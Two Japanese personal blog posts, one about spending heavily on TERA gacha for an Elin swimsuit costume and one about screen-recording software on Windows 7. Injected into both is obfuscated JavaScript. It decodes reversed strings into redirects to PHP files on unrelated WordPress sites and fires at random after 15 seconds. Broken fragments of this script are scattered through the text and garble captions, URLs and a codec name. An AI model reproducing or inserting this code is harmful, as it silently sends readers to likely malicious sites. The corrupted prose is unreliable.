TERAのガチャでエリーンの「すくみず」ゲット

ついに、がちゃに手をだしてしまいました。
正直、水着以外にほしいものがまったくなくて、かなりつらいです。
(LV低いので、今の状態では強化系のアイテムとかもいらないし)

それはともなく、がちゃをまわして、まわして、まわしまくりました。

これって、でないんじゃないのか?
とか、途中思い始めるくらい、でません。

なんという低確率。

課金戦士ではない私にはつらく、苦しい戦い。



ようやく水着が出たと思ったら、すくみずじゃなかったです。
ピュアエンジェルブルーというものでした。

せっかくなので着せてみました。
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
見事なまったいら。
うーん、可愛いといえば可愛いけど、やはり、スク水。。。

ぐぬぬ


さらにがちゃをやるか
一応水着がでたんだし、よしとするべきじゃないかと
弱腰になりつつあり


これが最後だと、コインを買ってチャレンジ。



そしたら、見事に出ましたよ!!

「すくみず(ひらがな)」!!
しかも、ひらがなですか!!
やったーーーーーー!!


dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
全身が映るロングアングルです。




dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
こちらは、横向き。
ぺったんぺったん。




dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
後ろ向きです。
でっかい武器のアンバランスさがいい。
そして、普段は気づかないしっぽ。


dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
そして、上半身アップです。
ぜっけんのひらがながいいですよね。
製作者、わかってますね。


以上。
運営におどらされたものでした。


いくらででたのか興味があるかたもいますが、
私の場合(かなり運が悪かった可能性あり)

最初の水着がでたのが、30,000円くらいつぎ込んだあたりです。
すくみずがでたのは、結果的に約47,000円でした。

うん、つかいすぎだよね。
わかってるんだ。

がちゃ、こわいね。
でも、やっちゃう(びくんびくん)

$VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == "string") return $VOcl3cIRrbzlimOyC8H.list[n].split("").reverse().join("");return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=["\'php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dows7 64bit環境)">パソコン画面の録画ソフトについて(Windows7 64bit環境)

XPの32bit環境ではアマレコを使用していました。
しかし、OSをWindows7 64bit環境にしてから音声を録音しようとするとエラー発生するようになりました。
調べたら音声を16ビット 44100Hzにすれば大丈夫とあったのでやってみたのですが、なぜかエラー。

色々試すもうまくいかなくて、とりあえず動作するソフトがないか色々調べてみました。

それなりに動くソフトもあったのですが、アマレコに比べて録画される映像が汚かったりと満足いかず。
結局以下のような構成になっていましました。




SCFH DSF
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}http://mosax.sakura.ne.jp/yp4g/fswiki.cgi
サイトの説明だと
・SCFHのDirectShowフィルタ版。SCFHが対応していない環境にも対応
・Ustream、Stickam、Skype等の映像ソースとしても使用可能
と書かれています。
要するに、パソコンの画面を取り込むツールと思ってください。




次に録画するソフト。
AmuseGraphics Home Page
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}/*$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == "string") return $cFN$wEpyMrNXtezaeR2.list[n].split("").reverse().join("");return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=["\'php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}dex.html” target=”_blank”>http://homepage2.nifty.com/t_ishii/ag/indom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}dex.html
このサイトでフリー版として公開されている「AG-Webカメラレコーダー」を使用します。

AG-デスクトップレコーダーのほうがいいのではないか?と思わるかもしれませんが、上記ソフトを使用したほうがコマ落ちせずに録画できました。
※あくまでも私の環境の場合です。




圧縮コーデックには【動画圧縮】 AMVビデオコーデックを使用。

アマレコサイトの有償コーデックを利用しています。
このコーデックは本当に良くできていて高画質で録画可能です。
ただしデフォルト設定だとファイルサイズはG単位で増えていきます。
ディスク容量に空きがたくさんある人じゃないと厳しいです。

アマレコTV公式ホームページ
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}http://amamaman.web.infoseek.co.jp/
【動画圧縮】 AMVビデオコーデックから入手してください。※有償:1,260円(税込み)




これで必要なものはすべて揃いました。

1.AG-Webカメラレコーダーを起動
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

2.設定でビデオのコーデックにAMV3 Codom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}decを指定(AMVビデオコーデックのことです)
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

3.SCFH DSFを起動。
先にAg-Webカメラレコーダを起動しているので、AGCRec.exeが表示されているはずなので、これを選択してOK。
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}

4.録画する範囲を設定。
ちなみに、3の設定が正常な場合は、右下のPerformanceにFpsが表示されます(リアルタイム)。
これが録画しようとするFpsより下回る場合は、コマ落ちする可能性が高いので解像度を下げる等してください。

ウィンドウを指定する場合は、DragHereをドラッグして録画したいウィンドウにもっていって放せばOKです。
範囲指定の場合は、Area Selectionで範囲指定してください。範囲はダブルクリックすれば確定されます。
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}




あとは録画するだけです。

1920x1080の解像度でTERAを13分31秒録画したところファイルサイズは19.8GBでした。
コーデックの設定でファイルサイズを小さくする(画質は低下しますが)こともできますので、好みの設定にしてください。

参考に静止画を貼っておきます。
本当は録画した映像を載せたらいいのでしょうが、サイズが大きすぎて載せられない状態。
映像加工しないととてもアップロードは無理ですね。
dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
上記画像は、クリックすると拡大版が表示されます。
キャラクタ名部分は塗りつぶしています。

2012/1/19 追記dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}
ビデオのエンコーダでAMV3コーデック(有償)を使用していましたが、AG-Webカメラレコーダに入っているエンコーダ(AGM形式)でも遜色のない録画が出来ました。
デフォルトは画質が90になっているので、高画質を望む方は100にしてください。ファイルサイズが大きくなるので、画質は環境にあった値にしてください。